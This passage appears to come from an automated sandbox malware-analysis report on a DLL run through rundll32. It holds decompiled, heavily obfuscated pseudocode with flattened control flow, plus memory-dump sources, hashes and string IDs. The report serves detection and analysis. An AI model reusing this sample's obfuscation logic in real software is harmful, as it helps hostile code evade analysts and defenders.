                                                                        				_v140 = 0xc302;
                                                                        				_v140 = _v140 << 0xf;
                                                                        				_v140 = _v140 ^ 0x61816c1a;
                                                                        				_v160 = 0x48ef;
                                                                        				_v160 = _v160 ^ 0xebfd6bf9;
                                                                        				_v160 = _v160 ^ 0xebfd7750;
                                                                        				_v260 = 0x5362;
                                                                        				_v260 = _v260 >> 6;
                                                                        				_t404 = 0x6c;
                                                                        				_v260 = _v260 / 0;
                                                                        				_v260 = _v260 ^ 0xee3aff63;
                                                                        				_v260 = _v260 ^ 0xee3aef31;
                                                                        				_v236 = 0xd35f;
                                                                        				_v236 = _v236 << 0x10;
                                                                        				_v236 = _v236 + 0x2900;
                                                                        				_v236 = _v236 + 0x50af;
                                                                        				_v236 = _v236 ^ 0xd35f0d2f;
                                                                        				_v212 = 0x828e;
                                                                        				_v212 = _v212 | 0x8b388828;
                                                                        				_v212 = _v212 * 0xa;
                                                                        				_v212 = _v212 ^ 0x70352860;
                                                                        				_v228 = 0xeb91;
                                                                        				_v228 = _v228 ^ 0xa86be6f8;
                                                                        				_v228 = _v228 + 0xffff5277;
                                                                        				_v228 = _v228 ^ 0xa86a6f69;
                                                                        				_v184 = 0xae04;
                                                                        				_v184 = _v184 + 0xffff62af;
                                                                        				_v184 = _v184 ^ 0x0000117e;
                                                                        				_v224 = 0x33a1;
                                                                        				_v224 = _v224 >> 1;
                                                                        				_v224 = _v224 >> 7;
                                                                        				_v224 = _v224 ^ 0x00005b9c;
                                                                        				_v268 = 0xe65;
                                                                        				_v268 = _v268 * 0x1a;
                                                                        				_v268 = _v268 >> 2;
                                                                        				_v268 = _v268 >> 5;
                                                                        				_v268 = _v268 ^ 0x00000bed;
                                                                        				_v176 = 0xa4d1;
                                                                        				_v176 = _v176 | 0x37797fb5;
                                                                        				_v176 = _v176 ^ 0x3779d180;
                                                                        				_v252 = 0x4dfa;
                                                                        				_v252 = _v252 >> 0xf;
                                                                        				_v252 = _v252 ^ 0x7040ff32;
                                                                        				_v252 = _v252 ^ 0x70408cc6;
                                                                        				_v276 = 0x9261;
                                                                        				_v276 = _v276 ^ 0x928292e1;
                                                                        				_v276 = _v276 + 0xbfd3;
                                                                        				_v276 = _v276 >> 0xd;
                                                                        				_v276 = _v276 ^ 0x0004a09c;
                                                                        				_v192 = 0x5c67;
                                                                        				_v192 = _v192 << 4;
                                                                        				_v192 = _v192 >> 0xf;
                                                                        				_v192 = _v192 ^ 0x00002cc8;
                                                                        				_v204 = 0xa9b8;
                                                                        				_v204 = _v204 << 5;
                                                                        				_v204 = _v204 + 0xffff3dee;
                                                                        				_v204 = _v204 ^ 0x0014203e;
                                                                        				_v180 = 0xc206;
                                                                        				_v180 = _v180 * 0x36;
                                                                        				_v180 = _v180 ^ 0x0028c8dc;
                                                                        				_v280 = 0x96db;
                                                                        				_v280 = _v280 + 0xeb7e;
                                                                        				_v280 = _v280 >> 7;
                                                                        				_v280 = _v280 ^ 0x33900b7e;
                                                                        				_v280 = _v280 ^ 0x33901db2;
                                                                        				_v208 = 0xb5f5;
                                                                        				_v208 = _v208 >> 6;
                                                                        				_v208 = _v208 + 0xfc0c;
                                                                        				_v208 = _v208 ^ 0x0000fee2;
                                                                        				_t436 = _v132;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t427 = _v264;
                                                                        					_t365 = _v272;
                                                                        					while(1) {
                                                                        						_t445 = _t437 - 0x19192d48;
                                                                        						if(_t445 > 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						L3:
                                                                        						if(_t445 == 0) {
                                                                        							_v124 = _t404;
                                                                        							_t379 = E100105E8( &_v108,  *((intOrPtr*)( *0x100221b4 + 0x14)), _v148, _v212, _v228, _v184, _v224, _v208,  *((intOrPtr*)( *0x100221b4)),  &_v124);
                                                                        							_t442 =  &(_t442[8]);
                                                                        							if(_t379 == 0) {
                                                                        								_t437 = 0x272c22c8;
                                                                        							} else {
                                                                        								_t410 =  &_v1;
                                                                        								_t433 = _t436;
                                                                        								do {
                                                                        									 *_t433 =  *_t410;
                                                                        									_t433 = _t433 + 1;
                                                                        									_t410 = _t410 - 1;
                                                                        								} while (_t410 >=  &_v96);
                                                                        								_t437 = 0xe3e0850;
                                                                        							}
                                                                        							goto L9;
                                                                        						} else {
                                                                        							if(_t437 == 0x95d06e9) {
                                                                        								_t383 = _a4 + 1;
                                                                        								if((_t383 & 0x0000000f) != 0) {
                                                                        									_t383 = (_t383 & 0xfffffff0) + 0x10;
                                                                        								}
                                                                        								 *((intOrPtr*)(_t399 + 4)) = _t383 + 0x74;
                                                                        								_push(_t404);
                                                                        								_t436 = E100157E8( *((intOrPtr*)(_t399 + 4)));
                                                                        								 *_t399 = _t436;
                                                                        								if(_t436 == 0) {
                                                                        									goto L34;
                                                                        								}
                                                                        								_t305 = _t436 + 0x74; // 0x74
                                                                        								_t427 = _t305;
                                                                        								_t365 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
                                                                        								_v264 = _t305;
                                                                        								_t437 = 0x154603b2;
                                                                        								_v132 = _a4;
                                                                        								_v272 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
                                                                        								goto L10;
                                                                        							} else {
                                                                        								if(_t437 == 0xe3e0850) {
                                                                        									_v128 = 0x14;
                                                                        									_t391 = E10007471(_v156, _v268, _v176, _v252,  &_v128, _v276, _t436 + 0x60, _t404, _v192, _v136);
                                                                        									_t427 = _v264;
                                                                        									_t442 =  &(_t442[8]);
                                                                        									_t365 = _v272;
                                                                        									_t404 = 0x6c;
                                                                        									if(_t391 == 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										_t437 = 0x272c22c8;
                                                                        										_v164 = 1;
                                                                        										goto L9;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t437 == 0x13292eb2) {
                                                                        										_t437 = 0x95d06e9;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t437 != 0x154603b2) {
                                                                        											L30:
                                                                        											if(_t437 == 0x4324b34) {
                                                                        												L34:
                                                                        												return _v164;
                                                                        											}
                                                                        											goto L1;
                                                                        										} else {
                                                                        											_t280 =  &_v284; // 0xee3aef31
                                                                        											E1000CB42(_v244,  *_t280, _v168, _t404,  &_v136,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t404, _v220);
                                                                        											_t442 =  &(_t442[6]);
                                                                        											asm("sbb esi, esi");
                                                                        											_t437 = (_t437 & 0xeb9139e0) + 0x306f06ef;
                                                                        											L9:
                                                                        											_t365 = _v272;
                                                                        											_t427 = _v264;
                                                                        											L10:
                                                                        											_t404 = 0x6c;
                                                                        											while(1) {
                                                                        												_t445 = _t437 - 0x19192d48;
                                                                        												if(_t445 > 0) {
                                                                        													goto L23;
                                                                        												}
                                                                        												goto L3;
                                                                        											}
                                                                        											goto L23;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L24:
                                                                        						if(_t437 == 0x272c22c8) {
                                                                        							_push(_t404);
                                                                        							E1000D7B0(_v136);
                                                                        							_t437 = 0x306f06ef;
                                                                        							goto L9;
                                                                        						}
                                                                        						if(_t437 != 0x306f06ef) {
                                                                        							if(_t437 != 0x31bcf33d) {
                                                                        								goto L30;
                                                                        							} else {
                                                                        								E1001413E(_v144, _v288, _v152, _v140, _v160,  &_v132, _t427,  *((intOrPtr*)( *0x100221b4)),  &_v132, _v260, _v136, _t365, _v236,  &_v132);
                                                                        								_t442 =  &(_t442[0xc]);
                                                                        								asm("sbb esi, esi");
                                                                        								_t437 = (_t437 & 0xf1ed0a80) + 0x272c22c8;
                                                                        								goto L9;
                                                                        							}
                                                                        						}
                                                                        						_t372 = _v164;
                                                                        						if(_t372 == 0) {
                                                                        							E100091CD(_v232, _v240, _v248,  *_t399, _v256);
                                                                        							goto L34;
                                                                        						}
                                                                        						return _t372;
                                                                        						L23:
                                                                        						if(_t437 == 0x1c0040cf) {
                                                                        							E10009970(_v188,  *_t440, _v196, _t427, _a4, _v172);
                                                                        							_t442 =  &(_t442[4]);
                                                                        							_t437 = 0x31bcf33d;
                                                                        							_t404 = 0x6c;
                                                                        							goto L30;
                                                                        						}
                                                                        						goto L24;
                                                                        					}
                                                                        				}
                                                                        			}

































































                                                                        0x10010b16
                                                                        0x10010b1e
                                                                        0x10010b26
                                                                        0x10010b2b
                                                                        0x10010b30
                                                                        0x10010b38
                                                                        0x10010b40
                                                                        0x10010b45
                                                                        0x10010b4d
                                                                        0x10010b55
                                                                        0x10010b62
                                                                        0x10010b66
                                                                        0x10010b6e
                                                                        0x10010b76
                                                                        0x10010b7e
                                                                        0x10010b83
                                                                        0x10010b8b
                                                                        0x10010b93
                                                                        0x10010b9b
                                                                        0x10010ba0
                                                                        0x10010ba8
                                                                        0x10010bb0
                                                                        0x10010bb7
                                                                        0x10010bb7
                                                                        0x10010bb7
                                                                        0x10010bbb
                                                                        0x10010bbf
                                                                        0x10010bbf
                                                                        0x10010bc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010bcb
                                                                        0x10010bcb
                                                                        0x10010d1a
                                                                        0x10010d57
                                                                        0x10010d5c
                                                                        0x10010d61
                                                                        0x10010d87
                                                                        0x10010d63
                                                                        0x10010d63
                                                                        0x10010d6a
                                                                        0x10010d6c
                                                                        0x10010d6e
                                                                        0x10010d70
                                                                        0x10010d71
                                                                        0x10010d79
                                                                        0x10010d7d
                                                                        0x10010d7d
                                                                        0x00000000
                                                                        0x10010bd1
                                                                        0x10010bd7
                                                                        0x10010cbf
                                                                        0x10010cc2
                                                                        0x10010cc7
                                                                        0x10010cc7
                                                                        0x10010ccd
                                                                        0x10010cd8
                                                                        0x10010ce1
                                                                        0x10010ce3
                                                                        0x10010ce8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010cf1
                                                                        0x10010cf1
                                                                        0x10010cf7
                                                                        0x10010cfa
                                                                        0x10010cfe
                                                                        0x10010d03
                                                                        0x10010d0a
                                                                        0x00000000
                                                                        0x10010bdd
                                                                        0x10010be3
                                                                        0x10010c5a
                                                                        0x10010c8d
                                                                        0x10010c92
                                                                        0x10010c96
                                                                        0x10010c9b
                                                                        0x10010ca1
                                                                        0x10010ca2
                                                                        0x00000000
                                                                        0x10010ca8
                                                                        0x10010caa
                                                                        0x10010cb0
                                                                        0x00000000
                                                                        0x10010cb0
                                                                        0x10010be5
                                                                        0x10010beb
                                                                        0x10010c46
                                                                        0x00000000
                                                                        0x10010bed
                                                                        0x10010bf3
                                                                        0x10010e6a
                                                                        0x10010e70
                                                                        0x10010e9c
                                                                        0x00000000
                                                                        0x10010e9c
                                                                        0x00000000
                                                                        0x10010bf9
                                                                        0x10010c16
                                                                        0x10010c1e
                                                                        0x10010c23
                                                                        0x10010c28
                                                                        0x10010c30
                                                                        0x10010c36
                                                                        0x10010c36
                                                                        0x10010c3a
                                                                        0x10010c3e
                                                                        0x10010c40
                                                                        0x10010bbf
                                                                        0x10010bbf
                                                                        0x10010bc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010bc5
                                                                        0x00000000
                                                                        0x10010bbf
                                                                        0x10010bf3
                                                                        0x10010beb
                                                                        0x10010be3
                                                                        0x10010bd7
                                                                        0x10010d9d
                                                                        0x10010da3
                                                                        0x10010e28
                                                                        0x10010e30
                                                                        0x10010e37
                                                                        0x00000000
                                                                        0x10010e37
                                                                        0x10010dab
                                                                        0x10010db7
                                                                        0x00000000
                                                                        0x10010dbd
                                                                        0x10010dff
                                                                        0x10010e04
                                                                        0x10010e09
                                                                        0x10010e11
                                                                        0x00000000
                                                                        0x10010e11
                                                                        0x10010db7
                                                                        0x10010e77
                                                                        0x10010e80
                                                                        0x10010e94
                                                                        0x00000000
                                                                        0x10010e99
                                                                        0x10010ead
                                                                        0x10010d91
                                                                        0x10010d97
                                                                        0x10010e5a
                                                                        0x10010e5f
                                                                        0x10010e62
                                                                        0x10010e69
                                                                        0x00000000
                                                                        0x10010e69
                                                                        0x00000000
                                                                        0x10010d97
                                                                        0x10010bbf

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .U$1:$NC$S~$`(5p$bS$g\$sQ$}$~$H$H
                                                                        • API String ID: 0-2586239605
                                                                        • Opcode ID: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
                                                                        • Instruction ID: dc36ea8a0aec24ac7b9885ce2b919ce4aba11c0453d1abd8bba0bdbca8633019
                                                                        • Opcode Fuzzy Hash: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
                                                                        • Instruction Fuzzy Hash: 3A1222755083819FE364CF65C98AA4BBBF1FB84748F108A1CF6D98A260D7B59948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1000A176() {
                                                                        				char _v524;
                                                                        				signed int _v532;
                                                                        				intOrPtr _v536;
                                                                        				intOrPtr _v540;
                                                                        				intOrPtr _v544;
                                                                        				intOrPtr _v548;
                                                                        				intOrPtr _v552;
                                                                        				intOrPtr _v556;
                                                                        				intOrPtr _v560;
                                                                        				char _v564;
                                                                        				intOrPtr _v568;
                                                                        				char _v572;
                                                                        				signed int _v576;
                                                                        				signed int _v580;
                                                                        				signed int _v584;
                                                                        				signed int _v588;
                                                                        				signed int _v592;
                                                                        				signed int _v596;
                                                                        				signed int _v600;
                                                                        				signed int _v604;
                                                                        				signed int _v608;
                                                                        				signed int _v612;
                                                                        				signed int _v616;
                                                                        				signed int _v620;
                                                                        				signed int _v624;
                                                                        				signed int _v628;
                                                                        				signed int _v632;
                                                                        				signed int _v636;
                                                                        				signed int _v640;
                                                                        				signed int _v644;
                                                                        				signed int _v648;
                                                                        				signed int _v652;
                                                                        				signed int _v656;
                                                                        				signed int _v660;
                                                                        				signed int _v664;
                                                                        				signed int _v668;
                                                                        				signed int _v672;
                                                                        				signed int _v676;
                                                                        				signed int _v680;
                                                                        				signed int _v684;
                                                                        				signed int _v688;
                                                                        				signed int _v692;
                                                                        				signed int _v696;
                                                                        				signed int _v700;
                                                                        				signed int _v704;
                                                                        				signed int _v708;
                                                                        				signed int _t350;
                                                                        				intOrPtr _t357;
                                                                        				void* _t360;
                                                                        				void* _t361;
                                                                        				void* _t366;
                                                                        				void* _t367;
                                                                        				char _t375;
                                                                        				signed int _t404;
                                                                        				signed int _t405;
                                                                        				signed int _t406;
                                                                        				signed int _t407;
                                                                        				signed int _t408;
                                                                        				signed int _t409;
                                                                        				signed int _t410;
                                                                        				signed int _t411;
                                                                        				signed int* _t414;
                                                                        
                                                                        				_t414 =  &_v708;
                                                                        				_v616 = 0x2445;
                                                                        				_v616 = _v616 >> 0x10;
                                                                        				_v616 = _v616 ^ 1;
                                                                        				_v636 = 0xeea4;
                                                                        				_t367 = 0x3f32878;
                                                                        				_v636 = _v636 << 0xb;
                                                                        				_v636 = _v636 << 1;
                                                                        				_v636 = _v636 ^ 0x0eea4100;
                                                                        				_v652 = 0xe797;
                                                                        				_v652 = _v652 ^ 0x321c1edf;
                                                                        				_v652 = _v652 ^ 0xd996a04c;
                                                                        				_v652 = _v652 ^ 0xeb8a76ce;
                                                                        				_v588 = 0xdcfc;
                                                                        				_v588 = _v588 >> 7;
                                                                        				_v588 = _v588 ^ 0x00000f60;
                                                                        				_v612 = 0x8579;
                                                                        				_v612 = _v612 + 0x6109;
                                                                        				_v612 = _v612 ^ 0x0000e794;
                                                                        				_v648 = 0x1b6b;
                                                                        				_v648 = _v648 + 0xffff6a60;
                                                                        				_v648 = _v648 << 0x10;
                                                                        				_v648 = _v648 ^ 0x85cb09dc;
                                                                        				_v584 = 0x1ff6;
                                                                        				_v584 = _v584 << 0x10;
                                                                        				_v584 = _v584 ^ 0x1ff65b4e;
                                                                        				_v684 = 0xbc40;
                                                                        				_v684 = _v684 >> 2;
                                                                        				_v684 = _v684 + 0xffffd1fb;
                                                                        				_v684 = _v684 | 0x2742d37c;
                                                                        				_v684 = _v684 ^ 0x2742ef01;
                                                                        				_v576 = 0x685a;
                                                                        				_t404 = 0x6c;
                                                                        				_v576 = _v576 / _t404;
                                                                        				_v576 = _v576 ^ 0x00007f72;
                                                                        				_t366 = 0;
                                                                        				_v708 = 0x6bcc;
                                                                        				_v708 = _v708 >> 8;
                                                                        				_t405 = 0x3a;
                                                                        				_v708 = _v708 * 0x2a;
                                                                        				_v708 = _v708 >> 7;
                                                                        				_v708 = _v708 ^ 0x0000462a;
                                                                        				_v692 = 0xff9b;
                                                                        				_v692 = _v692 | 0x74d94da3;
                                                                        				_v692 = _v692 + 0xffffcc68;
                                                                        				_v692 = _v692 | 0xbe89bc47;
                                                                        				_v692 = _v692 ^ 0xfed98c58;
                                                                        				_v632 = 0x3226;
                                                                        				_v632 = _v632 | 0x070ffe2e;
                                                                        				_v632 = _v632 / _t405;
                                                                        				_v632 = _v632 ^ 0x001f3575;
                                                                        				_v600 = 0xa48;
                                                                        				_v600 = _v600 + 0xb52e;
                                                                        				_v600 = _v600 ^ 0x0000cedf;
                                                                        				_v580 = 0xa18a;
                                                                        				_v580 = _v580 | 0x0c5a8a6e;
                                                                        				_v580 = _v580 ^ 0x0c5abff1;
                                                                        				_v664 = 0xe8f;
                                                                        				_t406 = 0x37;
                                                                        				_v664 = _v664 / _t406;
                                                                        				_t407 = 0x46;
                                                                        				_v664 = _v664 / _t407;
                                                                        				_v664 = _v664 ^ 0x00006dce;
                                                                        				_v640 = 0x71c;
                                                                        				_v640 = _v640 << 0xe;
                                                                        				_t408 = 0x49;
                                                                        				_v640 = _v640 * 0x34;
                                                                        				_v640 = _v640 ^ 0x5c6c577c;
                                                                        				_v592 = 0x33b8;
                                                                        				_v592 = _v592 | 0x07d87d51;
                                                                        				_v592 = _v592 ^ 0x07d84187;
                                                                        				_v696 = 0xa98f;
                                                                        				_v696 = _v696 << 0xf;
                                                                        				_v696 = _v696 + 0xffffe799;
                                                                        				_v696 = _v696 + 0xffff3d0e;
                                                                        				_v696 = _v696 ^ 0x54c69949;
                                                                        				_v704 = 0x7465;
                                                                        				_v704 = _v704 + 0xffffe849;
                                                                        				_v704 = _v704 / _t408;
                                                                        				_v704 = _v704 + 0xd0f1;
                                                                        				_v704 = _v704 ^ 0x0000e434;
                                                                        				_v596 = 0x236f;
                                                                        				_v596 = _v596 | 0xc5dcb8d9;
                                                                        				_v596 = _v596 ^ 0xc5dcb094;
                                                                        				_v644 = 0x8021;
                                                                        				_v644 = _v644 ^ 0xc828a343;
                                                                        				_v644 = _v644 >> 3;
                                                                        				_v644 = _v644 ^ 0x190550b3;
                                                                        				_v604 = 0xfe6;
                                                                        				_v604 = _v604 >> 0xb;
                                                                        				_v604 = _v604 ^ 0x00002a8f;
                                                                        				_v668 = 0x55eb;
                                                                        				_v668 = _v668 | 0x71753889;
                                                                        				_v668 = _v668 << 6;
                                                                        				_v668 = _v668 ^ 0x5d5f3da4;
                                                                        				_v608 = 0x70d4;
                                                                        				_v608 = _v608 << 0xf;
                                                                        				_v608 = _v608 ^ 0x386a033c;
                                                                        				_v624 = 0xcf56;
                                                                        				_t409 = 0x3d;
                                                                        				_v624 = _v624 / _t409;
                                                                        				_v624 = _v624 | 0x0bd4b4ae;
                                                                        				_v624 = _v624 ^ 0x0bd4d1b6;
                                                                        				_v660 = 0x16e5;
                                                                        				_t410 = 0x36;
                                                                        				_v660 = _v660 * 0x41;
                                                                        				_v660 = _v660 / _t410;
                                                                        				_v660 = _v660 ^ 0x0000307e;
                                                                        				_v700 = 0xe2b6;
                                                                        				_v700 = _v700 + 0x5bb5;
                                                                        				_v700 = _v700 + 0xffff6142;
                                                                        				_v700 = _v700 + 0x6e4e;
                                                                        				_v700 = _v700 ^ 0x000141ab;
                                                                        				_v656 = 0xb40;
                                                                        				_v656 = _v656 + 0xffff4f1f;
                                                                        				_v656 = _v656 ^ 0x21083a9e;
                                                                        				_v656 = _v656 ^ 0xdef717ac;
                                                                        				_v672 = 0x17c4;
                                                                        				_v672 = _v672 | 0x21da6493;
                                                                        				_t411 = 0x13;
                                                                        				_v672 = _v672 / _t411;
                                                                        				_v672 = _v672 * 0x3b;
                                                                        				_v672 = _v672 ^ 0x691fea24;
                                                                        				_v620 = 0x1ec3;
                                                                        				_v620 = _v620 | 0x77b1d73c;
                                                                        				_v620 = _v620 + 0xffffec92;
                                                                        				_v620 = _v620 ^ 0x77b1dc68;
                                                                        				_v628 = 0x112b;
                                                                        				_t403 = _v616;
                                                                        				_v628 = _v628 * 0x73;
                                                                        				_v628 = _v628 << 0xd;
                                                                        				_v628 = _v628 ^ 0xf6ca7d12;
                                                                        				_v680 = 0x3092;
                                                                        				_v680 = _v680 * 0x68;
                                                                        				_v680 = _v680 << 1;
                                                                        				_v680 = _v680 + 0xfffffa86;
                                                                        				_v680 = _v680 ^ 0x00277106;
                                                                        				_v676 = 0x2780;
                                                                        				_v676 = _v676 ^ 0x4b6da339;
                                                                        				_v676 = _v676 * 0x7a;
                                                                        				_v676 = _v676 << 0xe;
                                                                        				_v676 = _v676 ^ 0x500a8000;
                                                                        				_v688 = 0x8ae7;
                                                                        				_v688 = _v688 | 0x8dfab5cc;
                                                                        				_v688 = _v688 * 0x18;
                                                                        				_v688 = _v688 | 0x52f27c13;
                                                                        				_v688 = _v688 ^ 0x5ff3fe78;
                                                                        				do {
                                                                        					while(_t367 != 0x3ba1fc4) {
                                                                        						if(_t367 == 0x3f32878) {
                                                                        							_t367 = 0x26bd27de;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t367 == 0x20bf73ca) {
                                                                        								_push(0x10001000);
                                                                        								_push(_v684);
                                                                        								E100163BF(E1001BF25(_v648, _v584, __eflags), __eflags, _v708, _v692,  &_v524,  *0x100221b0, _v632,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v600);
                                                                        								E1001C5F7(_v580, _v664, _v640, _v592, _t351);
                                                                        								_t414 =  &(_t414[0xb]);
                                                                        								_t367 = 0x3ba1fc4;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t367 == 0x24e637ac) {
                                                                        									_t357 = _v568;
                                                                        									_t375 = _v572;
                                                                        									_v560 = _t357;
                                                                        									_v552 = _t357;
                                                                        									_v544 = _t357;
                                                                        									_v536 = _t357;
                                                                        									_v532 = _v676;
                                                                        									_v564 = _t375;
                                                                        									_v556 = _t375;
                                                                        									_v548 = _t375;
                                                                        									_v540 = _t375;
                                                                        									_t360 = E1000BFA7(_v624, _t375, _v660, _v700,  &_v564, _t403, _v656);
                                                                        									_t414 =  &(_t414[6]);
                                                                        									_t367 = 0x2e72accb;
                                                                        									__eflags = _t360;
                                                                        									_t361 = 1;
                                                                        									_t366 =  !=  ? _t361 : _t366;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t367 == 0x26bd27de) {
                                                                        										E10012092(_v652,  &_v572, _v588, _v612);
                                                                        										_t367 = 0x2c000c16;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t367 == 0x2c000c16) {
                                                                        											_v572 = _v572 - E100023BC();
                                                                        											_t367 = 0x20bf73ca;
                                                                        											asm("sbb [esp+0x9c], edx");
                                                                        											continue;
                                                                        										} else {
                                                                        											if(_t367 != 0x2e72accb) {
                                                                        												goto L18;
                                                                        											} else {
                                                                        												E100078F0(_t403, _v672, _v620, _v628, _v680);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L9:
                                                                        						return _t366;
                                                                        					}
                                                                        					_t350 = E1000492A(_v688, _v616, _v696, _v704, _v596, _t367, _v636, _v644, _t367,  &_v524, 0, _v604, _v668, _v608);
                                                                        					_t403 = _t350;
                                                                        					_t414 =  &(_t414[0xc]);
                                                                        					__eflags = _t350 - 0xffffffff;
                                                                        					if(__eflags == 0) {
                                                                        						_t367 = 0x1fc7849e;
                                                                        						goto L18;
                                                                        					} else {
                                                                        						_t367 = 0x24e637ac;
                                                                        						continue;
                                                                        					}
                                                                        					goto L9;
                                                                        					L18:
                                                                        					__eflags = _t367 - 0x1fc7849e;
                                                                        				} while (__eflags != 0);
                                                                        				goto L9;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: a$&2$*F$4$E$$H$Nn$Zh$o#$|Wl\$~0$U
                                                                        • API String ID: 0-3924455481
                                                                        • Opcode ID: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
                                                                        • Instruction ID: 30a98e3762f80b306428089b8d4b001a67ddc991bb08abca52d42ae898d556aa
                                                                        • Opcode Fuzzy Hash: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
                                                                        • Instruction Fuzzy Hash: 61F113715083819FE368CF25C989A4BBBF1FBC5758F108A1DF299862A0D7B58949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E100193C9() {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				signed int _v1044;
                                                                        				intOrPtr _v1048;
                                                                        				signed int _v1052;
                                                                        				signed int _v1056;
                                                                        				unsigned int _v1060;
                                                                        				signed int _v1064;
                                                                        				signed int _v1068;
                                                                        				signed int _v1072;
                                                                        				signed int _v1076;
                                                                        				signed int _v1080;
                                                                        				signed int _v1084;
                                                                        				signed int _v1088;
                                                                        				unsigned int _v1092;
                                                                        				signed int _v1096;
                                                                        				signed int _v1100;
                                                                        				signed int _v1104;
                                                                        				signed int _v1108;
                                                                        				signed int _v1112;
                                                                        				signed int _v1116;
                                                                        				signed int _v1120;
                                                                        				signed int _v1124;
                                                                        				signed int _v1128;
                                                                        				signed int _v1132;
                                                                        				signed int _v1136;
                                                                        				signed int _v1140;
                                                                        				signed int _v1144;
                                                                        				signed int _v1148;
                                                                        				signed int _v1152;
                                                                        				signed int _v1156;
                                                                        				signed int _v1160;
                                                                        				signed int _v1164;
                                                                        				signed int _v1168;
                                                                        				void* _t291;
                                                                        				void* _t297;
                                                                        				signed int _t301;
                                                                        				signed int _t302;
                                                                        				signed int _t303;
                                                                        				signed int _t304;
                                                                        				signed int _t305;
                                                                        				signed int _t306;
                                                                        				signed int _t307;
                                                                        				void* _t347;
                                                                        				signed int* _t351;
                                                                        
                                                                        				_t351 =  &_v1168;
                                                                        				_v1044 = _v1044 & 0x00000000;
                                                                        				_v1048 = 0x516598;
                                                                        				_v1108 = 0x3b16;
                                                                        				_v1108 = _v1108 * 0x74;
                                                                        				_t347 = 0x311804be;
                                                                        				_v1108 = _v1108 ^ 0xd50e416f;
                                                                        				_v1108 = _v1108 ^ 0xd514c4cb;
                                                                        				_v1084 = 0x7213;
                                                                        				_v1084 = _v1084 + 0xffff1ce9;
                                                                        				_v1084 = _v1084 ^ 0xffffb376;
                                                                        				_v1076 = 0x942d;
                                                                        				_v1076 = _v1076 + 0x8243;
                                                                        				_v1076 = _v1076 ^ 0x00015e40;
                                                                        				_v1160 = 0xefc2;
                                                                        				_v1160 = _v1160 + 0xffff37ee;
                                                                        				_v1160 = _v1160 ^ 0xc712f7cb;
                                                                        				_t301 = 0x1e;
                                                                        				_v1160 = _v1160 / _t301;
                                                                        				_v1160 = _v1160 ^ 0x06a2c559;
                                                                        				_v1168 = 0x8bc8;
                                                                        				_v1168 = _v1168 >> 0xd;
                                                                        				_v1168 = _v1168 << 0xd;
                                                                        				_t302 = 0xb;
                                                                        				_v1168 = _v1168 * 0x79;
                                                                        				_v1168 = _v1168 ^ 0x003cfea4;
                                                                        				_v1092 = 0xa545;
                                                                        				_v1092 = _v1092 >> 9;
                                                                        				_v1092 = _v1092 ^ 0x00005d7c;
                                                                        				_v1140 = 0xa869;
                                                                        				_v1140 = _v1140 + 0x7fc8;
                                                                        				_v1140 = _v1140 / _t302;
                                                                        				_v1140 = _v1140 ^ 0x00006e61;
                                                                        				_v1116 = 0x2c70;
                                                                        				_v1116 = _v1116 << 0xf;
                                                                        				_v1116 = _v1116 << 6;
                                                                        				_v1116 = _v1116 ^ 0x8e00790e;
                                                                        				_v1068 = 0x820b;
                                                                        				_v1068 = _v1068 << 2;
                                                                        				_v1068 = _v1068 ^ 0x00020295;
                                                                        				_v1052 = 0x1207;
                                                                        				_t303 = 0x11;
                                                                        				_v1052 = _v1052 * 0x74;
                                                                        				_v1052 = _v1052 ^ 0x00087ea5;
                                                                        				_v1072 = 0x355d;
                                                                        				_v1072 = _v1072 << 8;
                                                                        				_v1072 = _v1072 ^ 0x00352c0b;
                                                                        				_v1080 = 0x10d0;
                                                                        				_v1080 = _v1080 << 0xd;
                                                                        				_v1080 = _v1080 ^ 0x021a6542;
                                                                        				_v1088 = 0x6c30;
                                                                        				_v1088 = _v1088 >> 8;
                                                                        				_v1088 = _v1088 ^ 0x00000016;
                                                                        				_v1152 = 0xa8ea;
